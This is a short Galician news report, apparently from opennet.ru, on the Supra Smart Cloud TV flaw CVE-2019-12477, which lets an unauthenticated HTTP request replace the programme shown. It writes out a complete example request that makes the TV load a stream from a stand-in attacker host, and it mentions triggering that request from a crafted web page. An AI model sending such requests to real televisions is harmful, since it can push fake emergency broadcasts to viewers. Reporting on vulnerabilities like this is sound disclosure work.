Nos televisores Supra Smart Cloud vulnerabilidade (CVE-2019-12477) que lle permite substituír o programa visualizado actualmente polo contido do atacante. Como exemplo, móstrase a saída dun aviso ficticio sobre unha situación de emerxencia.
Para un ataque, abonda con enviar unha solicitude de rede especialmente elaborada que non require autenticación. En particular, pode acceder ao controlador “/remote/media_control?action=setUri&uri=” especificando o URL do ficheiro m3u8 con parámetros de vídeo, por exemplo “http://192.168.1.155/remote/media_control?action=setUri&uri= http://attacker .com/fake_broadcast_message.m3u8.”
Na maioría dos casos, o acceso ao enderezo IP do televisor está limitado á rede interna, pero dado que a solicitude se envía a través de HTTP, é posible utilizar métodos para acceder aos recursos internos cando o usuario abre unha páxina externa especialmente deseñada (por exemplo, baixo o disfrace dunha solicitude de imaxe ou usando o ).
Fonte: opennet.ru